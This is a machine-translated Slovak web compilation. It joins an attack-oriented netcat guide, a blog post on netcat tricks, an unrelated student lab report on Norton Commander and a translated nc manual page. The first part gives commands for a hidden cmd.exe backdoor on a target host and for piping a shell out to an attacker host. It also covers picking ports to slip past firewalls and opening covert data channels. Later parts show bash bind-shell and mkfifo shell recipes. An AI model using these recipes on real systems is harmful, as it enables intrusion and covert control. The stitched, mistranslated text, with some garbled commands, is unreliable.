Netcat nc s podporou parametrov. Užitočné unixové nástroje. Netcat. ...a prenosný skener portov
Hlavným účelom nástroja netcat (alebo 'nc', ako sa príslušný spustiteľný súbor nazýva) je poskytnúť používateľovi možnosť prenášať akékoľvek údaje cez sieť pomocou prenosového protokolu TCP alebo UDP. Okrem toho môže netcat vykonávať niekoľko ďalších zaujímavých funkcií, ako je skenovanie UDP alebo TCP portov.
V tomto prípade môže užívateľ najmä:
- voľne vyberte port väzby (lokálny aj vzdialený);
- vykonávať (nevykonávať) dopredný a spätný preklad DNS mien;
- naviazať netcat na ktorúkoľvek z adries na úrovni siete lokálneho uzla;
- prenos vstupných správ na spracovanie do iného programu;
- šifrovať prenášané dáta (táto funkcia je implementovaná vo verzii netcat, tzv. cryptcat).
Základné prevádzkové režimy
Základné prevádzkové režimy pomôcky netcat sú režim klienta a režim servera.
Najjednoduchšia možnosť spustenia v klientskom režime:
nc hostiteľský port
(ak potrebujete použiť protokol TCP), príp
nc -u hostiteľský port
(ak potrebujete použiť protokol UDP).
Ak voľba -u nie je povolená, ihneď po spustení v tomto režime sa netcat pokúsi vytvoriť TCP spojenie s portom hostiteľského uzla.
Úlohou netcatu je preniesť do zásuvky host:port všetko, čo k nej príde cez štandardný INPUT kanál, a vydať na štandardný VÝSTUP všetko, čo k nej príde z tejto zásuvky.
Najjednoduchšia možnosť spustenia v serverovom režime:
nc -l -p port
Po spustení v tomto režime čaká netcat na požiadavky na vytvorenie spojenia s portom TCP. Po nadviazaní spojenia odošle všetko, čo k nemu príde cez toto spojenie, na štandardný OUTPUT kanál a všetko, čo k nemu príde, pošle späť cez štandardný INPUT kanál.
Použitie pri príprave a vedení softvérových útokov
Takýto široký účel nástroja netcat otvára veľa možností na jeho použitie. Pri príprave a vykonávaní softvérových útokov je možné použiť netcat na riešenie napríklad nasledujúcich problémov:
- identifikácia služieb poskytovaných sieťovými uzlami (skenovaním TCP a UDP portov);
- identifikácia softvérových služieb, ktoré sieťové uzly poskytujú (zbieraním tokenov);
- prienik do sieťových uzlov alebo narušenie dostupnosti služieb, ktoré poskytujú;
- vytváranie skrytých kanálov na ovládanie sieťových uzlov;
- vytváranie skrytých kanálov na prenos údajov.
V posledných dvoch prípadoch je veľmi užitočná možnosť šifrovania výmeny medzi klientom a serverom netcat (implementovaná v cryptcat).
Použitie netcat na preniknutie do hostiteľov siete alebo vzdialené narušenie dostupnosti služieb, ktoré poskytujú
O penetrácii sieťového uzla sa hovorí v dvoch významoch:
1) ako o zmocnení sa oprávnenia používateľa uzla (subjektom, ktorý nemal žiadne oprávnenie týkajúce sa tohto uzla);
2) ako prekonať obmedzenia týkajúce sa výmeny informácií s uzlom, ktoré ukladá brána firewall (sieť).
netcat môže byť užitočný v oboch prípadoch.
Prevzatie právomocí možné prostredníctvom vzdialeného útoku na server, ktorý patrí k cieľu útoku (napríklad pomocou zraniteľnosti servera, ako je pretečenie vyrovnávacej pamäte). V tomto prípade musí byť útočník schopný preniesť určité údaje na server. Spravidla ide o dáta, ktoré nie je možné preniesť pomocou bežného klientskeho programu (ale je možné pomocou netcatu, keďže netcat umožňuje prenášať akékoľvek dáta).
Preniknúť cez firewall (sieť) Schopnosť Netcatu viazať sa na akýkoľvek lokálny port (povolená voľbou -p) môže pomôcť. Napríklad, ak sa netcat v klientskom režime viaže na TCP Port 20 (ftp-data), v mnohých prípadoch brány firewall povolia pripojenie k hostiteľovi (hostiteľom) v sieti, ktorú chránia.
Na prerušenie dostupnosti služieb možno využiť schopnosť netcatu prenášať akékoľvek dáta na akýkoľvek server (napríklad nesprávne požiadavky, ktoré vedú k zamrznutiu servera).
Použitie netcat na vytvorenie skrytých riadiacich kanálov pre sieťové uzly
Predpokladajme, že cieľom útoku je hostiteľ s operačným systémom MS Windows NT. Po vystúpení na cieľ útoku
nc –L -p xxxx -d -e cmd.exe
(kde xxxx je ľubovoľné číslo portu), získame skrytý riadiaci kanál pre tento objekt. Tu možnosť -e umožňuje režim, v ktorom je štandardný VÝSTUP výsledkov netcat pripojený k štandardnému INPUT cmd.exe a štandardný VÝSTUP výsledkov a chybových hlásení cmd.exe je pripojený k štandardnému VSTUPU netcat. Voľba -L má rovnaký účinok ako -l s tým rozdielom, že určuje, že netcat musí byť reštartovaný s rovnakými argumentmi po dokončení každého pripojenia. Voľba -d (detach) sa používa na skrytie spustenia (netcat nevytvára okná a nezobrazuje sa v zozname úloh). Ďalší skrytý efekt možno dosiahnuť premenovaním spustiteľného súboru netcat.
Tento kanál môžete použiť, ak napríklad spúšťate netcat na inom uzle takto:
nc troy xxxx
kde troy je adresa alebo názov cieľa útoku.
Voľba -e však nie je vždy podporovaná implementáciami netcat. Ak táto možnosť nie je podporovaná, podobný výsledok možno dosiahnuť spustením dvoch inštancií netcat na cieľ útoku a na hostiteľskom počítači útočníka. Môžete napríklad použiť nasledujúci scenár. Na cieľ útoku bežte:
nc -L -p xxxx -d | cmd.exe | nc odysseus yyyy
kde odysseus je adresa alebo názov hostiteľa útočníka.
A na útočníkovom uzle:
nc -l -p yyyy
nc troy xxxx
Tento scenár sa nazýva presmerovanie portov . Dbajte na správne poradie spúšťania programov (v tomto texte je nesprávne uvedené: server musí byť spustený skôr ako klient).
Tento skript je možné upraviť. Napríklad spustite netcat na cieli útoku iba v režime klienta a na hostiteľskom hostiteľovi útočníka iba v režime servera alebo naopak (pri dodržaní správneho poradia spúšťania: server by sa mal spustiť pred klientom).
Manipulácia s režimami spúšťania netcatu spolu so správnym výberom čísel portov môže v mnohých prípadoch prekonať firewall (sieť), ak sa použije na ochranu cieľa útoku (napríklad, ak sa použije vyššie uvedený scenár, výberom xxxx = 80 môže byť v mnohých prípadoch úspešné (port servera HTTP), yyyy = 25 (port servera SMTP)).
Použitie netcat na vytvorenie skrytých dátových kanálov
Zvážte napríklad, ako použiť netcat na prenos súboru zo zásuvky troy:xxxx do zásuvky mac:yyyy.
Ak to chcete urobiť, stačí spustiť niečo takéto na uzle mac:
nc -l -p yyyy > bohvie
a na node troy:
nc -p xxxx mac yyyy< prayer
Aj tu môže správna manipulácia so spúšťacími režimami netcat a číslami portov pomôcť prekonať obmedzenia, ktoré ukladajú brány firewall.
Toto je druhý príspevok zo série článkov o nástrojoch Unix, ktoré by ste mali vedieť. V tomto článku vám predstavujem nástroj netcat alebo jednoducho nc.
Nástroj Netcat sa často nazýva „švajčiarsky nôž“ v dobrom zmysle slova. Funkčnosť netcatu je užitočná v rovnakej miere ako všestrannosť a šikovnosť osvedčeného vreckového švajčiarskeho noža. Niektoré z jeho schopností zahŕňajú skenovanie portov, prenos súborov, počúvanie portov a možno ho použiť ako zadné vrátka.
Netcat sa v roku 2006 umiestnil na 4. mieste v prieskume „100 Network Security Utilities“, takže je to určite nástroj, ktorý potrebujete vedieť.
Ako používať nc?
Ak si pamätáte, povedal som, že netcat je švajčiarsky armádny nôž. Čo by to bol za nôž, keby sa nedal používať ako bežný nôž? To je dôvod, prečo je možné použiť netcat namiesto bežného telnetu:
$nc www.google.com 80
Je to vlastne pohodlnejšie ako bežný telnet, pretože spojenie môžete kedykoľvek ukončiť stlačením Ctrl+C a s binárnymi údajmi zaobchádza ako s normálnym (žiadne únikové sekvencie, nič).
Môžete pridať voľbu -v na zobrazenie výsledkov akcií podrobnejšie a voľbu (-vv) na získanie štatistiky o tom, koľko bajtov bolo prenesených počas aktuálnej relácie pripojenia.
Netcat môže byť použitý ako server. Ak ho spustíte ako je uvedené nižšie, bude počúvať na porte 12345 (na všetkých rozhraniach):
$ nc -l -p 12345
Ak sa teraz pripojíte k portu 12345 tohto hostiteľa, všetko, čo zadáte, sa odošle na vzdialenú stranu, čo nám hovorí, že netcat možno použiť ako chatovací server. Spustite na jednom z počítačov:
# Na počítači A s IP 10.10.10.10 $ nc -l -p 12345
A pripojte sa k nemu z iného:
# Na počítači B $ nc 10.10.10.10 12345
Teraz môžu obe strany hovoriť!
Tento spôsob hovoru, kde sa obe strany môžu navzájom rozprávať, umožňuje použiť nc pre I/O operácie cez sieť! Môžete napríklad poslať celý adresár z jedného počítača do druhého spustením tar pipeline cez nc na prvom počítači a presmerovaním výstupu do iného procesu tar na druhom.
Povedzme, že chcete odoslať súbory z adresára /data počítača A s IP 192.168.1.10 do počítača B (s ľubovoľnou IP). Je to jednoduché:
# Na počítači A s IP 192.168.1.10 $ tar -cf - /data | nc -l -p 6666 # Na počítači B $ nc 192.168.1.10 6666 | tar -xf -
Nezabudnite skombinovať pipeline s Pipe Viewer, ktorý bol popísaný v predchádzajúcom článku, aby ste videli štatistiky o tom, ako rýchlo prebieha prenos!
Jeden súbor je možné odoslať jednoduchšie:
# Na počítači A s IP 192.168.1.10 $ súbor mačiek | nc -l -p 6666 # Na počítači B $ nc 192.168.1.10 6666 > súbor
Môžete dokonca skopírovať a obnoviť celý disk pomocou nc:
# Na počítači A s IP 192.168.1.10 $ cat /dev/hdb | nc -l -p 6666 # Na počítači B $ nc 192.168.1.10 6666 > /dev/hdb
Poznámka: Možnosť „-l“ nemožno použiť v spojení s „-p“ na počítačoch Mac! Riešením je jednoducho nahradiť „-l -p 6666? na „-l 6666?. Ako tu:
# teraz nc počúva na porte 6666 pre počítače Mac $ nc -l 6666
Bežným používaním netcatu je skenovanie portov. Netcat nie je najlepší nástroj pre tento druh práce, ale svoju prácu zvládne (najlepšie je, samozrejme, nmap):
$ nc -v -n -z -w 1 192.168.1.2 1-1000 (NEZNÁME) 445 (microsoft-ds) otvorené (NEZNÁME) 139 (netbios-ssn) otvorené (NEZNÁME) 111 (sunrpc) otvorené (NEZNÁME) 80 ( www) otvorené (NEZNÁME) 25 (smtp): Časový limit pripojenia vypršal (NEZNÁMÉ) 22 (ssh) otvorené
Voľba -n zabraňuje vyhľadávaniu DNS, -z nečaká na odpoveď zo servera a -w 1? nastaví časový limit pripojenia na 1 sekundu.
Ďalšie netriviálne použitie netcat je ako proxy. Port aj hostiteľ môžu byť presmerované. Pozrite si tento príklad:
$ nc -l -p 12345 | nc www.google.com 80
Tento príkaz spustí nc na porte 1234 a presmeruje všetky pripojenia na google.com:80. Ak sa teraz pripojíte k tomuto počítaču na porte 12345 a zadáte požiadavku, zistíte, že ako odpoveď nedostanete žiadne údaje. Je to správne, pretože sme nevytvorili obojsmerný kanál. Ak pridáte druhý kanál, budete dostávať údaje na inom porte:
$ nc -l -p 12345 | nc www.google.com 80 | nc -l -p 12346
Po odoslaní požiadavky na port 12345 prijmite údaje odpovede na port 12346.
Pravdepodobne najvýkonnejšou funkciou netcat je spustiť akýkoľvek proces ako server:
$ nc -l -p 12345 -e /bin/bash
Voľba -e spôsobí, že vstup a výstup budú presmerované cez sieťovú zásuvku. Ak sa teraz pripojíte k hostiteľovi na porte 12345, môžete použiť bash:
$ nc localhost 12345 ls -las celkovo 4288 4 drwxr-xr-x 15 používateľov pkrumins 4096 2009-02-17 07:47 . 4 používatelia drwxr-xr-x 4 používatelia pkrumins 4096 2009-01-18 21:22 .. 8 -rw------- 1 používatelia pkrumins 8192 2009-02-16 19:30 .bash_history-4 -rw -r-- 1 používateľov pkrumins 220 2009-01-18 21:04 .bash_logout ...
Dôsledkom je, že nc je populárny hackerský nástroj a dá sa veľmi ľahko použiť na vytvorenie backdoor. Na serveri Linux môžete spustiť /bin/bash a na Windows cmd.exe a mať plnú kontrolu vo svojich rukách.
To je všetko, čo som chcel povedať. Poznáte nejaké ďalšie užitočné triky netcat, ktoré tu nie sú zahrnuté?
Ako nainštalovať nc?
Ak máte Debian alebo systém založený na Debiane, ako je Ubuntu, postupujte takto:
$ sudo aptitude nainštalovať netcat
Ak máte Fedoru alebo systém založený na Fedore, ako je CentOS, postupujte takto:
$ sudo yum nainštalujte netcat
Ak máte Slackware, FreeBSD, NetBSD, Solaris alebo Mac, stiahnite si zdroje nc a vykonajte:
$ tar -zxf nc-version.tar.gz $ cd nc-version $ ./configure && sudo make install
Ďalší spôsob, ako to urobiť na Macu, ak máte MacPorty:
$ sudo port nainštalovať netcat
Na Slackware ho môžete nainštalovať ako balík z adresára balíkov:
$ sudo installpkg nc-1.10-i386-1.tgz
Ak máte Windows, stiahnite si port Windoze z securityfocus.
Návod na obslužný program možno nájsť v man nc.
Bavte sa s nc, až nabudúce!
Katedra cestného projektovania
Laboratórna práca č.1
v kurze "Informatika"
Vyplnil študent skupiny č. 114359 Raikhman Sergey Yurievich
SkontrolovanéLaboratórna práca č.1
Predmet: Nástroj Norton Commander
Cieľ: Naučte sa ovládať počítač pomocou aplikácie Norton Commander
Norton Commander vám umožňuje vykonávať nasledujúce funkcie: 1) vykonávať funkcie systému MS-DOS, 2) zobrazovať obsah adresárov na diskoch, 3) zobrazovať strom adresárov na disku, 4) prezerať súbory, 5) upravovať textové súbory, 6 ) kopírovať, presúvať, premenovávať, mazať súbory, 7) meniť atribúty súborov.
Spustiť veliteľ Norton
Ak chcete spustiť Norton Commander, do príkazového riadka napíšte „nc“ a stlačte „Enter“. Ukončite Norton Commander - F10 alebo ALT+X
Pohľad na obrazovku a panely
Po spustení Norton Commander sa na obrazovke objavia dve obdĺžnikové okná (panely).
Pod týmito panelmi je riadok MS-DOS a informačný riadok s významom funkčných kláves.
F1 HELP – stručná informácia o účele kláves pri obsluhe NC.
F2 MENU – užívateľské menu
F3 VIEW – zobrazenie textového súboru, dokumentu
F4 EDIT – úprava textového súboru
F5 COPY – kopírovanie súborov
F6 RENMOV – poslať ďalej, premenovať súbor
F7 MKDIR – vytvorenie adresára (podadresárov)
F8 DELETE – mazanie súborov alebo podadresárov
F9 PULL DN – ponuky obsahujúce prevádzkové režimy NC sú zobrazené v hornom riadku obrazovky.
F10 QUIT – ukončenie NC
Menu pri stlačení klávesu F9
Vľavo a Vpravo – nastavenie režimu zobrazenia informácií na ľavom a pravom paneli
Súbory – so súbormi sa vykonávajú rôzne operácie
Príkazy – vykonáva rôzne NC príkazy, nastavuje konfiguráciu NC a prevádzkové režimy.
Jedna z položiek ponuky je zvýraznená, ak chcete vybrať inú položku, použite šípky<¬>, <>, <®>, <¯>a stlačte kláves „Enter“.
Výber súborov
Ak chcete kopírovať, mazať, presúvať súbory, musíte ich vybrať stlačením klávesu Ins. Ak chcete zrušiť výber, znova stlačte tlačidlo „Ins“. Informácie o počte vybratých súborov sa zobrazia v spodnej časti panela.
Vytvorenie adresára
Ak chcete vytvoriť adresár, stlačte kláves „F7“, zadajte jeho názov a stlačte „Enter“.
Pre vstup do adresára stlačte tlačidlo „Enter“ na jeho názve. Po stlačení klávesov „ALT+F10“ sa na obrazovke zobrazí strom adresárov. Pomocou kurzorových kláves sa môžete rýchlo presunúť do požadovaného podadresára.
Základné klávesy NC
TAB – prepnutie na iný panel
ALT+F1 – výstup v ľavom paneli obsahu iného disku.
ALT+F2 – výstup v pravom paneli obsahu iného disku
CTRL+F1 – odstránenie ľavého panela z obrazovky
CTRL+F2 – odstránenie pravého panela z obrazovky
CTRL+O – odstránenie oboch panelov
CTRL+U – výmena panelov
Ak chcete spustiť počítač, musíte do riadku s výzvou napísať „LOGIN“ a zadať heslo (335_2).
Laboratórne úlohy
Pomocou príkazov vytvorte na disku štruktúru podadresárov:
Pokyny pre prácu vNortonveliteľ
Ak chcete spustiť systém NC, zadajte príkaz NC do príkazového riadku systému DOS alebo kliknite ľavým tlačidlom myši na ikonu NC na pracovnej ploche počítača. Ak chcete ukončiť prácu s NC, stlačte tlačidlo [ F10] . V zobrazenom dialógovom okne vyberte odpoveď „Áno“, ak sa odhlásite zo systému, v opačnom prípade „Nie“. Výber možnosti odpovede sa vykonáva pomocou kurzorových kláves na funkčnej klávesnici a následným stlačením klávesu [ Zadajte] . Spodná časť obrazovky obsahuje príkazový riadok DOS, kde môžete zadávať príslušné príkazy pri práci pod NC kontrolou. Najspodnejší riadok obrazovky obsahuje nápovedný riadok, ktorý označuje účel hlavných „horúcich“ kláves, ktoré zodpovedajú príkazom NC (a DOS).
Po spustení NC sa na obrazovke objavia dva panely – ľavý a pravý. V hornej časti každého panela sa v malom obdĺžnikovom okne zobrazuje úplná cesta k aktuálnemu súboru alebo adresáru. Panel, v ktorom sa nachádza zvýraznený obdĺžnik, kurzor, sa nazýva aktívny. Na prechod z panelu na panel použite kláves . Ak je vybratý horný riadok na paneli a obrázok “…” to znamená, že ste v adresári s názvom zobrazeným v hornej časti panela. Na prácu s panelmi sa používajú nasledujúce príkazy:
[ Ctrl] + [ F1] Skryť/zobraziť ľavý panel
[ Ctrl] + [ F2] Skryť/zobraziť pravý panel
[ Ctrl] + [ U] Vymeňte panely
[ Ctrl] + [ O] Skryť/zobraziť oba panely
[ Ctrl] + [ P]Skryť/zobraziť neaktívny panel
Ak chcete zmeniť názov logického disku, kliknite na ľavý panel [ Alt] + [ F1] , v zobrazenom dialógovom okne vyberte pomocou kurzorových kláves požadovaný názov disku z navrhnutých názvov, stlačte kláves [ Zadajte] . Pre pravý panel sú akcie podobné, ale na začiatku by ste mali kliknúť [ Alt] + [ F2] .
Ak chcete prejsť do adresára, vyberte ho na aktívnom paneli a stlačte kláves [ Zadajte] . Ak chcete prejsť do adresára vyššej úrovne na aktívnom paneli, vyberte riadok “…” a stlačte kláves [ Zadajte] .
Na prácu s adresármi sa používajú nasledujúce príkazy:
[ F7] – vytvorte adresár. V zobrazenom dialógovom okne zadajte nový názov adresára;
[ F8] – vymazať adresár. V zobrazenom dialógovom okne potvrďte vymazanie alebo zrušte vymazanie stlačením klávesu Esc.
Na prácu so súbormi sa používajú nasledujúce príkazy:
[ Shift] + [ F4] – vytvorte súbor. V zobrazenom dialógovom okne zadajte nový názov súboru (nezabudnite zadať príponu). Po zadaní názvu súboru napíšte obsah súboru do pracovného priestoru obrazovky. Dokončite vytvorenie súboru príkazom [ Ctrl] + [ Z]. Ak chcete súbor uložiť, stlačte kláves [ F2] . Ukončite režim úprav pomocou tlačidla [ F10 ] .
[ F4] – úprava predtým vytvoreného dokumentu. V tomto prípade musíte v dialógovom okne zadať názov súboru, ktorý sa má upraviť. Pri práci v režime úprav sa v spodnej časti obrazovky zobrazí riadok s nápovedou s priradením klávesových skratiek v režime úprav.
[ Shift] + [ F2] – uloženie súboru s novým názvom.
[ F3] – zobrazenie obsahu súboru. Ak to chcete urobiť, najprv vyberte súbor na paneli.
[ F5] – kopírovanie súboru. Všetky operácie so súbormi a adresármi sa vykonávajú pomocou oboch panelov. Ak chcete skopírovať súbor, na neaktívnom paneli nastavte adresár, do ktorého sa skopírovaný súbor umiestni, prejdite do tohto adresára. Na aktívnom paneli vyberte súbor, ktorý chcete skopírovať, a stlačte kláves [ F5] . Pre potvrdenie kopírovania stlačte tlačidlo [ Zadajte] , zrušiť - .
[ F6] – prenos/premenovanie súboru. Operácia je podobná kopírovaniu. Ak chcete presunúť súbor, na neaktívnom paneli nastavte adresár, do ktorého bude súbor umiestnený, a prejdite do tohto adresára. Na aktívnom paneli vyberte súbor, ktorý chcete presunúť, a stlačte kláves [ F6] . Ak chcete premenovať súbor, zadajte nový názov súboru v dialógovom okne jeho pridaním pomocou ikony ” \ ” pri označovaní cesty. Je potrebné pamätať na to, že presunutý súbor sa vymaže z pôvodného umiestnenia.
[ F9] – prejdite do ponukyNC.
Skupinové operácie so súbormi
Operácie kopírovania, presúvania a odstraňovania je možné vykonávať na niekoľkých súboroch súčasne. Ak to chcete urobiť, musíte ich označiť zvýraznením na paneli a stlačením klávesu [ Vložiť] . V tomto prípade sú vybrané súbory zvýraznené obdĺžnikmi kontrastnej farby. Ak chcete výber odstrániť, zopakujte tieto kroky. Po procedúre výberu súboru sa vykoná požadovaná operácia (kopírovanie, presun, mazanie) so skupinou súborov, ako keby to bol jeden. Druhý spôsob výberu súboru je stlačením veľkého sivého tlačidla ”+” na funkčnej klávesnici vľavo. Po stlačení tohto klávesu by ste mali zadať názov súboru v dialógovom okne alebo zadať názvy súborov pri použití masky v názve: “ * ”, “ *.* ”, “ ? ”. Ak chcete zrušiť výber súborov, použite kláves „-“ na funkčnej klávesnici vľavo.
Systémové menu NC
Systém menu je navrhnutý tak, aby si prispôsobil shell a zjednodušil operácie. Lišta ponuky sa vyvolá stlačením klávesu [ F9] . Systém ponúk pozostáva z panela s ponukami a rozbaľovacích ponúk. Menu obsahuje nasledujúce položky: Vpravo Súbory Príkazy Nastavenia Vľavo . Tímy Správny A Vľavo určiť výber režimu zobrazenia súboru na paneli. Všetky možnosti príkazov pre ľavý a pravý panel sú identické. Tím Súbory určené na vykonávanie operácií so súbormi a adresármi. Položka menu Tímy je určený na vykonávanie ďalších príkazov. Tím nastavenie je určený na nastavenie NC prostredia. Výber príslušného príkazu sa vykonáva pomocou kurzorových kláves a následným stlačením [ Zadajte].
Položka menu Vľavo vpravo).
Rozbaľovacia ponuka tohto príkazu obsahuje možnosti výberu formátu pre zobrazenie súboru na obrazovke. V režime Stručný Panel zobrazuje iba názvy súborov a adresárov. V režime Plný Zobrazí sa názov súboru alebo adresára, pre súbor je uvedená jeho veľkosť, pre adresár - reťazec „podadresár“, dátum a čas vytvorenia súboru a adresára. V režime Strom Môžete zobraziť strom adresárov aktuálneho disku a pomocou kurzora rýchlo nájsť požadovaný súbor pohybom v strome. Ďalšia skupina možností pre túto položku ponuky určuje poradie, v ktorom sa súbory zobrazujú na paneli. V tomto prípade môžu byť súbory usporiadané v ľubovoľnom poradí - režime Žiadne triedenie , ale môžu byť usporiadané v špecifickom poradí: názov – podľa mena v abecednom poradí, Rozšírenie – rozšírením v abecednom poradí, čas – podľa dátumu vytvorenia so súbormi s poslednými dátumami vytvorenia umiestnenými na začiatku zoznamu, Veľkosť – podľa veľkosti súboru v zostupnom poradí. Výber riadku príslušného režimu sa vykonáva kurzorom a začiarkavacie políčko pomocou klávesu „medzera“.
Položka menu Súbory .
Rozbaľovacia ponuka tohto príkazu obsahuje popis účelu klávesových skratiek [ F1] - [ F8] , t.j. akcie klávesových skratiek sú duplikované príkazmi ponuky. Ďalšou možnosťou je Nastaviť atribúty. Atribúty sú nastavené len pre súbory. Poradie nastavenia atribútov je nasledovné: vyberte súbor kurzorom na paneli. Potom stlačte tlačidlo [ F9] prejdite do ponuky NC a vyberte položku Súbory Inštalácia atribúty . Po stlačení klávesu [ Zadajte] V dialógovom okne sa zobrazí zoznam možných atribútov: Iba na čítanie, Archív, Skryté, Systém. Výber riadku atribútu súboru sa vykonáva pomocou kurzora a začiarknutím políčka pomocou medzerníka. V tomto prípade súbor s atribútmi Len na čítanie nie je možné upraviť a je k dispozícii iba na prezeranie. Súbor atribútov Skryté na paneli je označený malým zvýrazneným obdĺžnikom (ak táto možnosť nie je nastavená v nastaveniach obrazovky Zobraziť skryté súbory Názov súboru sa na paneli vôbec nezobrazuje). Ďalšia skupina príkazov vám umožňuje vybrať súbory (podobne ako veľké šedé tlačidlo ”+” ), zrušte výber (podobne ako pri kľúči ” - ” na funkčnej klávesnici), invertovať výber (analogicky k ” * ” na funkčnej klávesnici).
Položka menu Tímy .
Rozbaľovacia ponuka tohto príkazu vám umožňuje vytvoriť používateľskú ponuku, upraviť túto ponuku, zobraziť históriu príkazov zadaných na príkazovom riadku DOS a obsahuje ďalšie doplnkové funkcie NC shellu.
Položka menu Nastavenie.
Rozbaľovacia ponuka tohto príkazu vám umožňuje konfigurovať prostredie rozhrania užívateľsky príjemným spôsobom. Obsahuje možnosť nastavenie Editor a ďalšie. Keď vyberiete lištu ponuky Nastavenia, otvorí sa sada dialógových okien, ktoré vám umožnia vybrať sadu farieb pre obrazovku, nastaviť počet riadkov na obrazovke atď. Dialógové okno Nastavenia panela umožňuje Zobraziť skryté súbory, ak je príslušné políčko začiarknuté (alebo sa nezobrazuje). Začiarknutie príslušných políčok sa vykonáva aj pomocou kurzora a medzerníka.
Laboratórna úloha
nc [-46bCDdhklnrStUuvZz] [-I dĺžka] [-i interval] [-O dĺžka] [-P proxy_username] [-p source_port] [-q sekúnd] [-s zdroj] [-T kľúčové slovo] [-V rttable] [-w čas vypršal] [-X proxy_protokol] [-X proxy_address[:prístav]] [destinácia] [prístav]možnosti
| -4 | sily nc používať iba adresy IPv4. |
| -6 | sily nc používať iba adresy IPv6. |
| -b | Povoliť vysielanie. |
| -C | Odoslať ako koniec riadku. |
| -D | Povoliť ladenie na zásuvke. |
| -d | Nepokúšajte sa čítať z stdin . |
| -h | Vytlačí nc pomoc. |
| -Ja dĺžka | Určuje veľkosť prijímacej vyrovnávacej pamäte TCP. |
| -i interval | Určuje časový interval medzi riadkami odoslaného a prijatého textu. Spôsobuje tiež oneskorenie medzi pripojeniami k viacerým portom. |
| -k | sily nc aby ste zostali počúvať ďalšie pripojenie po dokončení aktuálneho pripojenia. Je chybou použiť túto možnosť bez -l možnosť. |
| -l | Používa sa na upresnenie nc by mal skôr načúvať prichádzajúcemu pripojeniu ako iniciovať pripojenie k vzdialenému hostiteľovi. Je chybou použiť túto možnosť v spojení s -p, -s, alebo -z možnosti. Okrem toho akékoľvek časové limity špecifikované pomocou -w možnosť sú ignorované. |
| -n | Nevykonávajte žiadne vyhľadávanie DNS alebo služieb na žiadnych špecifikovaných adresách, názvoch hostiteľov alebo portoch. |
| -O dĺžka | Určuje veľkosť odosielacej vyrovnávacej pamäte TCP. |
| -P proxy_username | Určuje meno používateľa, ktoré sa má prezentovať serveru proxy, ktorý vyžaduje overenie. Ak nie je zadané žiadne používateľské meno, overenie sa nepokúsi. Autentifikácia proxy je v súčasnosti podporovaná iba pre proxy HTTP CONNECT. |
| -p source_port | Určuje zdrojový port, ktorý má nc použiť, s výhradou obmedzení privilégií a dostupnosti. |
| -q sekúnd | po EOF na stdin počkajte určený počet sekúnd a potom ukončite. Ak sú sekundy záporné, počkajte navždy. |
| -r | Určuje, že zdrojové alebo cieľové porty by sa mali vyberať náhodne namiesto sekvenčne v rámci rozsahu alebo v poradí, v akom ich systém priraďuje. |
| -S | Povolí možnosť podpisu RFC 2385 TCP MD5. |
| -s zdroj | Určuje rozhranie, ktoré sa používa na odosielanie paketov. Pre sokety datagramov domény UNIX špecifikuje lokálny dočasný súbor soketov, ktorý sa má vytvoriť a použiť, aby bolo možné prijímať datagramy. Je chybou použiť túto možnosť v spojení s -l možnosť. |
| -T kľúčové slovo | Zmeňte hodnotu TOS IPv4. kľúčové slovo môže byť jedným z kritický, inetcontrol, lowcost, nízke oneskorenie, netcontrol, priepustnosť, spoľahlivosť alebo jeden z bodov kódu DiffServ: ef, af11 ... af43, cs0 ... cs7; alebo číslo v šestnástkovej alebo desiatkovej sústave. |
| -t | Príčiny nc na odoslanie odpovedí RFC 854 DON"T a WON"T na požiadavky RFC 854 DO a WILL. To umožňuje použiť nc na skriptovanie telnetových relácií. |
| -U | Určuje použitie soketov domény UNIX. |
| -u | Namiesto predvolenej možnosti TCP použite UDP. Pre sokety domény UNIX použite datagramový soket namiesto streamového soketu. Ak sa použije soket domény UNIX, dočasný prijímací soket sa vytvorí v /tmp, pokiaľ nie je -s je daná vlajka. |
| -V rttable | Nastavte smerovaciu tabuľku, ktorá sa má použiť. Predvolená hodnota je 0. |
| -v | Mať nc poskytnúť podrobnejší výstup. |
| -w čas vypršal | Spojenia, ktoré sa nedajú nadviazať alebo sú nečinné po uplynutí časového limitu sekúnd. The -w vlajka nemá žiadny vplyv na -l možnosť, t.j. nc bude navždy počúvať pripojenie, s alebo bez -w vlajka. Predvolená hodnota nie je časový limit. |
| -X proxy_protokol | Žiada, aby nc pri komunikácii s proxy serverom používal zadaný protokol. Podporované protokoly sú " 4 " (PONOŽKY v.4) " 5 " (PONOŽKY v.5) a " pripojiť" (HTTPS proxy). Ak protokol nie je špecifikovaný, použije sa SOCKS verzia 5. |
| -X proxy_address[:port] | Žiada to nc by sa mal pripojiť k cieľu pomocou servera proxy na adrese proxy_address a prístav. Ak prístav nie je zadaný, používa sa známy port pre protokol proxy (1080 pre SOCKS, 3128 pre HTTPS). |
| -Z | Režim DCCP. |
| -z | Určuje, že nc by mal vyhľadávať iba počúvajúcich démonov bez toho, aby im posielal akékoľvek údaje. Je chybou použiť túto možnosť v spojení s -l možnosť. |
destinácia môže byť číselná IP adresa alebo symbolický názov hostiteľa (pokiaľ nie je -n je daná možnosť). Vo všeobecnosti musí byť špecifikované miesto určenia, pokiaľ nie -l je daná možnosť (v takom prípade sa použije lokálny hostiteľ). Pre sokety domény UNIX sa vyžaduje cieľ a je to cesta k soketu, ku ktorému sa má pripojiť (alebo počúvať, ak je to -l je daná možnosť).
port môže byť jedno celé číslo alebo rozsah portov. Rozsahy sú vo formulári nn-mm. Vo všeobecnosti musí byť určený cieľový port, pokiaľ nie je -U možnosť je daná.
Model klient/server
Vytvorenie veľmi základného modelu klient/server je celkom jednoduché nc. Na jednej konzole začnite nc počúvanie pripojenia na konkrétnom porte. Napríklad:
Nc-l 1234
nc teraz počúva na porte 1234 pre spojenie. Na druhej konzole (alebo druhom počítači) sa pripojte k počítaču a portu, na ktorom sa počúva:
Nc 127.0.0.1 1234
Teraz by malo byť spojenie medzi portami. Čokoľvek napísané na druhej konzole bude zreťazené s prvou a naopak. Po vytvorení pripojenia nc je úplne jedno, ktorá strana sa používa ako „server“ a ktorá strana sa používa ako „klient“. Spojenie môže byť ukončené pomocou EOF („ ^D’).
Nie je tam žiadny -c alebo -e možnosť v modernom netcat, ale stále môžete vykonať príkaz po vytvorení pripojenia presmerovaním deskriptorov súborov. Tu buďte opatrní, pretože otvorenie portu a nechať kohokoľvek pripojeného vykonať ľubovoľný príkaz na vašom webe je NEBEZPEČNÉ. Ak to naozaj potrebujete urobiť, tu je príklad:
Na strane "servera":
Rm-f/tmp/f; mkfifo /tmp/f cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f
Na strane "klienta":
Nc host.example.com 1234
